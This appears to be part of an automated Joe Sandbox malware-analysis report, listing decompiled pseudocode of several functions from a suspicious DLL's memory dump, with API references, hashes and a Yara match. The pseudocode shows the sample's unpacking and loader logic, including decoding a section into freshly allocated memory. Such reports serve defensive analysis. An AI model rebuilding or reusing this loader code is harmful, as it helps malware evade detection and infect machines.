                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                                    				CHAR* _t22;
                                                                                                                                                                                                                                    				CHAR* _t25;
                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                    				void* _t31;
                                                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                                                    				CHAR* _t36;
                                                                                                                                                                                                                                    				CHAR* _t42;
                                                                                                                                                                                                                                    				CHAR* _t43;
                                                                                                                                                                                                                                    				CHAR* _t44;
                                                                                                                                                                                                                                    				CHAR* _t46;
                                                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                                                    				void* _t51;
                                                                                                                                                                                                                                    				CHAR* _t54;
                                                                                                                                                                                                                                    				signed char _t56;
                                                                                                                                                                                                                                    				intOrPtr _t58;
                                                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                                                    				CHAR* _t65;
                                                                                                                                                                                                                                    				CHAR* _t66;
                                                                                                                                                                                                                                    				char* _t67;
                                                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t61 = __edx;
                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                    				_t21 = E02F9550E();
                                                                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                                                                    					_t59 =  *0x2f9d25c; // 0x2000000a
                                                                                                                                                                                                                                    					_t55 = (_t59 & 0xf0000000) + _t21;
                                                                                                                                                                                                                                    					 *0x2f9d25c = (_t59 & 0xf0000000) + _t21;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t22 =  *0x2f9d164(0, 2); // executed
                                                                                                                                                                                                                                    				_v16 = _t22;
                                                                                                                                                                                                                                    				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                                                                                                                                                                                                    					_t25 = E02F93D0D( &_v8,  &_v20); // executed
                                                                                                                                                                                                                                    					_t54 = _t25;
                                                                                                                                                                                                                                    					_t26 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    					if( *0x2f9d25c > 5) {
                                                                                                                                                                                                                                    						_t8 = _t26 + 0x2f9e5cd; // 0x4d283a53
                                                                                                                                                                                                                                    						_t27 = _t8;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t7 = _t26 + 0x2f9ea15; // 0x44283a44
                                                                                                                                                                                                                                    						_t27 = _t7;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					E02F91BF4(_t27, _t27);
                                                                                                                                                                                                                                    					_t31 = E02F91B2F(_t61,  &_v20,  &_v12); // executed
                                                                                                                                                                                                                                    					if(_t31 == 0) {
                                                                                                                                                                                                                                    						CloseHandle(_v20);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t62 = 5;
                                                                                                                                                                                                                                    					if(_t54 != _t62) {
                                                                                                                                                                                                                                    						 *0x2f9d270 =  *0x2f9d270 ^ 0x81bbe65d;
                                                                                                                                                                                                                                    						_t32 = E02F92049(0x60);
                                                                                                                                                                                                                                    						__eflags = _t32;
                                                                                                                                                                                                                                    						 *0x2f9d32c = _t32;
                                                                                                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                                                                                                    							_push(8);
                                                                                                                                                                                                                                    							_pop(0);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							memset(_t32, 0, 0x60);
                                                                                                                                                                                                                                    							_t49 =  *0x2f9d32c; // 0x33e95b0
                                                                                                                                                                                                                                    							_t68 = _t68 + 0xc;
                                                                                                                                                                                                                                    							__imp__(_t49 + 0x40);
                                                                                                                                                                                                                                    							_t51 =  *0x2f9d32c; // 0x33e95b0
                                                                                                                                                                                                                                    							 *_t51 = 0x2f9e836;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                                                    						_t54 = 0;
                                                                                                                                                                                                                                    						if(0 == 0) {
                                                                                                                                                                                                                                    							_t36 = RtlAllocateHeap( *0x2f9d238, 0, 0x43);
                                                                                                                                                                                                                                    							__eflags = _t36;
                                                                                                                                                                                                                                    							 *0x2f9d2c4 = _t36;
                                                                                                                                                                                                                                    							if(_t36 == 0) {
                                                                                                                                                                                                                                    								_push(8);
                                                                                                                                                                                                                                    								_pop(0);
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t56 =  *0x2f9d25c; // 0x2000000a
                                                                                                                                                                                                                                    								_t61 = _t56 & 0x000000ff;
                                                                                                                                                                                                                                    								_t58 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    								_t13 = _t58 + 0x2f9e55a; // 0x697a6f4d
                                                                                                                                                                                                                                    								_t55 = _t13;
                                                                                                                                                                                                                                    								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x2f9c2a7);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags = 0;
                                                                                                                                                                                                                                    							_t54 = 0;
                                                                                                                                                                                                                                    							if(0 == 0) {
                                                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                                                    								E02F9269C( ~_v8 &  *0x2f9d270, 0x2f9d00c); // executed
                                                                                                                                                                                                                                    								_t42 = E02F94094(_t55); // executed
                                                                                                                                                                                                                                    								_t54 = _t42;
                                                                                                                                                                                                                                    								__eflags = _t54;
                                                                                                                                                                                                                                    								if(_t54 != 0) {
                                                                                                                                                                                                                                    									goto L30;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t43 = E02F996A4(_t55); // executed
                                                                                                                                                                                                                                    								__eflags = _t43;
                                                                                                                                                                                                                                    								if(_t43 != 0) {
                                                                                                                                                                                                                                    									__eflags = _v8;
                                                                                                                                                                                                                                    									_t65 = _v12;
                                                                                                                                                                                                                                    									if(_v8 != 0) {
                                                                                                                                                                                                                                    										L29:
                                                                                                                                                                                                                                    										_t44 = E02F96786(_t61, _t65, _v8); // executed
                                                                                                                                                                                                                                    										_t54 = _t44;
                                                                                                                                                                                                                                    										goto L30;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									__eflags = _t65;
                                                                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                                                                    										goto L30;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									_t46 = E02F93DD9(__eflags,  &(_t65[4])); // executed
                                                                                                                                                                                                                                    									_t54 = _t46;
                                                                                                                                                                                                                                    									__eflags = _t54;
                                                                                                                                                                                                                                    									if(_t54 == 0) {
                                                                                                                                                                                                                                    										goto L30;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									goto L29;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t54 = 8;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t66 = _v12;
                                                                                                                                                                                                                                    						if(_t66 == 0) {
                                                                                                                                                                                                                                    							L30:
                                                                                                                                                                                                                                    							if(_v16 == 0 || _v16 == 1) {
                                                                                                                                                                                                                                    								 *0x2f9d160();
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L34;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t67 =  &(_t66[4]);
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    						} while (E02F9A501(_t62, _t67, 0, 1) == 0x4c7);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L30;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t54 = _t22;
                                                                                                                                                                                                                                    					L34:
                                                                                                                                                                                                                                    					return _t54;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}
































                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f92403
                                                                                                                                                                                                                                    0x02f92408
                                                                                                                                                                                                                                    0x02f9240a
                                                                                                                                                                                                                                    0x02f9240c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9240c
                                                                                                                                                                                                                                    0x02f923ef
                                                                                                                                                                                                                                    0x02f923ef
                                                                                                                                                                                                                                    0x02f923c0
                                                                                                                                                                                                                                    0x02f922fe
                                                                                                                                                                                                                                    0x02f922fe
                                                                                                                                                                                                                                    0x02f92303
                                                                                                                                                                                                                                    0x02f92419
                                                                                                                                                                                                                                    0x02f9241d
                                                                                                                                                                                                                                    0x02f92425
                                                                                                                                                                                                                                    0x02f92425
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9241d
                                                                                                                                                                                                                                    0x02f92309
                                                                                                                                                                                                                                    0x02f9230c
                                                                                                                                                                                                                                    0x02f92316
                                                                                                                                                                                                                                    0x02f9231d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9242d
                                                                                                                                                                                                                                    0x02f9242d
                                                                                                                                                                                                                                    0x02f92431
                                                                                                                                                                                                                                    0x02f92435
                                                                                                                                                                                                                                    0x02f92435

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 02F9550E: GetModuleHandleA.KERNEL32(4C44544E,00000000,02F92274,00000000,00000000), ref: 02F9551D
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 02F922F1
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                    • memset.NTDLL ref: 02F92340
                                                                                                                                                                                                                                    • RtlInitializeCriticalSection.NTDLL(033E9570), ref: 02F92351
                                                                                                                                                                                                                                      • Part of subcall function 02F93DD9: memset.NTDLL ref: 02F93DEE
                                                                                                                                                                                                                                      • Part of subcall function 02F93DD9: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02F93E22
                                                                                                                                                                                                                                      • Part of subcall function 02F93DD9: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 02F93E2D
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 02F9237C
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 02F923AC
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4246211962-0
                                                                                                                                                                                                                                    • Opcode ID: d5d765a93ae258e245829dfafe674ede755a16a2478b7a06b80a0dfa5c934190
                                                                                                                                                                                                                                    • Instruction ID: 5b6daa204a90760605308367114801594fc318f35d8b0c0cf5f1c3908381b003
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5d765a93ae258e245829dfafe674ede755a16a2478b7a06b80a0dfa5c934190
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0051DF71E40219BBFF20ABB9DD84F6EB7A9AB087C4F104826EB01D7242E7719954CF50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(80000002), ref: 02F93B46
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(02F91885), ref: 02F93B89
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02F93B9D
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02F93BAB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 344208780-0
                                                                                                                                                                                                                                    • Opcode ID: bb4d6e40519a211fba361e6cc509fa038c6ee37e4e9b10ef0f7110e54dbb4fa3
                                                                                                                                                                                                                                    • Instruction ID: 287b98a60ae6d542340f3fd538a785522fd7f5c7fe0aefd0910713086742421f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb4d6e40519a211fba361e6cc509fa038c6ee37e4e9b10ef0f7110e54dbb4fa3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1731ECB2900109EFDF05DF98D8C48AEBBB5FF48384B10846EE60AE7210D7359685CF61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                    			E004018F4(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				unsigned int _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                    				intOrPtr _t47;
                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                                                    				intOrPtr _t66;
                                                                                                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                    				signed int _t80;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t77 =  *0x404130;
                                                                                                                                                                                                                                    				_t39 = E00401F5D(_t77,  &_v20,  &_v12);
                                                                                                                                                                                                                                    				_v16 = _t39;
                                                                                                                                                                                                                                    				if(_t39 == 0) {
                                                                                                                                                                                                                                    					asm("sbb ebx, ebx");
                                                                                                                                                                                                                                    					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                                                                                                                                                                                                                                    					_t78 = _t77 + _v20;
                                                                                                                                                                                                                                    					_v36 = _t78;
                                                                                                                                                                                                                                    					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
                                                                                                                                                                                                                                    					_v24 = _t46;
                                                                                                                                                                                                                                    					if(_t46 == 0) {
                                                                                                                                                                                                                                    						_v16 = 8;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t61 = 0;
                                                                                                                                                                                                                                    						if(_t59 <= 0) {
                                                                                                                                                                                                                                    							_t47 =  *0x40414c;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t66 = _a4;
                                                                                                                                                                                                                                    							_t50 = _t46 - _t78;
                                                                                                                                                                                                                                    							_t11 = _t66 + 0x4051a7; // 0x4051a7
                                                                                                                                                                                                                                    							_v28 = _t50;
                                                                                                                                                                                                                                    							_v32 = _t50 + _t11;
                                                                                                                                                                                                                                    							_v8 = _t78;
                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                                                                    								_t19 = _t61 + 1; // 0x2
                                                                                                                                                                                                                                    								_t80 = _t19;
                                                                                                                                                                                                                                    								E004018C4(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
                                                                                                                                                                                                                                    								_t64 = _v32;
                                                                                                                                                                                                                                    								_v8 = _v8 + 0x1000;
                                                                                                                                                                                                                                    								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
                                                                                                                                                                                                                                    								_t61 = _t80;
                                                                                                                                                                                                                                    								 *0x40414c = _t47;
                                                                                                                                                                                                                                    								if(_t61 >= _t59) {
                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t50 = _v28;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_t47 != 0x63699bc3) {
                                                                                                                                                                                                                                    							_v16 = 0xc;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							memcpy(_v36, _v24, _v12);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						VirtualFree(_v24, 0, 0x8000); // executed
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v16;
                                                                                                                                                                                                                                    			}
























                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,0040167D,00003000,00000004,?,?,0040167D,00000000), ref: 0040194A
                                                                                                                                                                                                                                    • memcpy.NTDLL(?,?,0040167D,?,?,0040167D,00000000), ref: 004019DC
                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,0040167D,00000000), ref: 004019F7
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                                                                                    • String ID: Mar 9 2021
                                                                                                                                                                                                                                    • API String ID: 4010158826-2159264323
                                                                                                                                                                                                                                    • Opcode ID: ecb228c351fb0361c2fc9e029ed6e6128681d59fb3180a8fdea020d7e3bab62b
                                                                                                                                                                                                                                    • Instruction ID: 0ad7c3425218c347bc4ddf429e648667056d2cd7a8494b6520e06ca5c12f1d10
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ecb228c351fb0361c2fc9e029ed6e6128681d59fb3180a8fdea020d7e3bab62b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF3163B1E011199FDF01CF99C881AAEBBB9FF48304F108139E505BB295D775AA45CF98
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                                                                                                    			E02F91A70(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                    				intOrPtr* _t32;
                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                    				int _t46;
                                                                                                                                                                                                                                    				intOrPtr* _t47;
                                                                                                                                                                                                                                    				int _t48;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t47 = __eax;
                                                                                                                                                                                                                                    				_push( &_v12);
                                                                                                                                                                                                                                    				_push(__eax);
                                                                                                                                                                                                                                    				_t39 = 0;
                                                                                                                                                                                                                                    				_t46 = 0; // executed
                                                                                                                                                                                                                                    				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                                                                                                                                    				_v8 = _t26;
                                                                                                                                                                                                                                    				if(_t26 < 0) {
                                                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_v12 == 0) {
                                                                                                                                                                                                                                    					Sleep(0xc8);
                                                                                                                                                                                                                                    					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_v8 >= _t39) {
                                                                                                                                                                                                                                    					_t28 = _v12;
                                                                                                                                                                                                                                    					if(_t28 != 0) {
                                                                                                                                                                                                                                    						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                                                                                                                                                                                                    						_v8 = _t31;
                                                                                                                                                                                                                                    						if(_t31 >= 0) {
                                                                                                                                                                                                                                    							_t46 = lstrlenW(_v16);
                                                                                                                                                                                                                                    							if(_t46 != 0) {
                                                                                                                                                                                                                                    								_t46 = _t46 + 1;
                                                                                                                                                                                                                                    								_t48 = _t46 + _t46;
                                                                                                                                                                                                                                    								_t39 = E02F92049(_t48);
                                                                                                                                                                                                                                    								if(_t39 == 0) {
                                                                                                                                                                                                                                    									_v8 = 0x8007000e;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									memcpy(_t39, _v16, _t48);
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								__imp__#6(_v16);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t32 = _v12;
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					 *_a4 = _t39;
                                                                                                                                                                                                                                    					 *_a8 = _t46 + _t46;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L13;
                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1198164300-0
                                                                                                                                                                                                                                    • Opcode ID: bd62412861778fe7a73d43f9b345ec2783cf93fd4cfe92fe302c4f64639ba057
                                                                                                                                                                                                                                    • Instruction ID: e817dbf0e71f8b2b16fc07a96a3005e17e79ccb5e8d681e8e704e35fcaaf4319
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd62412861778fe7a73d43f9b345ec2783cf93fd4cfe92fe302c4f64639ba057
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72213275E0020AEFEF11DFA8D88499EBBB6FF49355B104579EA09D7214E7309A44CF50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                    			E02F994A9(char* __eax) {
                                                                                                                                                                                                                                    				char* _t8;
                                                                                                                                                                                                                                    				intOrPtr _t12;
                                                                                                                                                                                                                                    				char* _t21;
                                                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                                                    				char* _t24;
                                                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t21 = __eax;
                                                                                                                                                                                                                                    				_push(0x20);
                                                                                                                                                                                                                                    				_t23 = 1;
                                                                                                                                                                                                                                    				_push(__eax);
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_t8 = StrChrA();
                                                                                                                                                                                                                                    					if(_t8 == 0) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t23 = _t23 + 1;
                                                                                                                                                                                                                                    					_push(0x20);
                                                                                                                                                                                                                                    					_push( &(_t8[1]));
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t12 = E02F92049(_t23 << 2);
                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                                                                                                                                                                                                                    				if(_t12 != 0) {
                                                                                                                                                                                                                                    					StrTrimA(_t21, 0x2f9c2a4); // executed
                                                                                                                                                                                                                                    					_t26 = 0;
                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                    						_t24 = StrChrA(_t21, 0x20);
                                                                                                                                                                                                                                    						if(_t24 != 0) {
                                                                                                                                                                                                                                    							 *_t24 = 0;
                                                                                                                                                                                                                                    							_t24 =  &(_t24[1]);
                                                                                                                                                                                                                                    							StrTrimA(_t24, 0x2f9c2a4);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                                                                                                                                                                                                                                    						_t26 = _t26 + 1;
                                                                                                                                                                                                                                    						_t21 = _t24;
                                                                                                                                                                                                                                    					} while (_t24 != 0);
                                                                                                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,00000020,00000000,033E95AC,?,02F923DE,?,02F97634,033E95AC,?,02F923DE), ref: 02F994C3
                                                                                                                                                                                                                                    • StrTrimA.KERNELBASE(?,02F9C2A4,00000002,?,02F923DE,?,02F97634,033E95AC,?,02F923DE), ref: 02F994E2
                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,00000020,?,02F923DE,?,02F97634,033E95AC,?,02F923DE), ref: 02F994ED
                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000001,02F9C2A4,?,02F923DE,?,02F97634,033E95AC,?,02F923DE), ref: 02F994FF
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
• Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
• Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
• Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Trim
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3043112668-0
                                                                                                                                                                                                                                    • Opcode ID: ed38d38e48d712b2da7886d4eacbc714612879a0058778f2f225387347241457
                                                                                                                                                                                                                                    • Instruction ID: 8140043c14d5f0a65f4d8a5add08ea4b68a843b12d792eecc0253bc2c087459a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed38d38e48d712b2da7886d4eacbc714612879a0058778f2f225387347241457
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86015272A453156FF7319E69CC49F3BBBD8EB8AAD4F12051DFA45C7240DBA0C8018AA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

